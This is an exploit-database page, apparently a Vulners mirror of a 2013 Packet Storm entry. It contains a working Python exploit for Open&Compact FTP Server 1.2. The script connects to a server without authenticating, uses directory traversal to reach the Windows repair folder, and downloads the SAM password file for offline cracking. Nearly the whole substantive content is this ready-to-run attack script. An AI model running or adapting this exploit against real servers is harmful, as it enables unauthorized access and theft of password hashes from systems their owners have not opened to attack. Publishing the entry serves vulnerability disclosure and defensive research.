Lucene search
+L

Open And Compact FTP Server 1.2 Bypass / Directory Traversal

🗓️ 08 Aug 2013 00:00:00Reported by WireghoulType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

Open&Compact Ftp Server 1.2 Auth Bypass & Directory Traversal for SAM retrieva

Related
Code
`#!/usr/bin/python  
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval  
# Date: Aug 7, 2013  
# By Wireghoul - http://www.justanotherhacker.com  
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)  
# Software Link: http://sourceforge.net/projects/open-ftpd/  
# Version: <= 1.2  
# Tested on: Windows 7, Windows XP SP3  
  
# Abusing authentication bypass in combination with a directory traversal to grab  
# the sam file for offline cracking  
  
import ftplib  
import os  
  
# Connect to server  
  
ftp = ftplib.FTP( "192.168.58.135" )  
ftp.set_pasv( False )  
  
# Note that we need no authentication at all!!  
  
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )  
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )  
  
ftp.quit()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2013 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.28605
44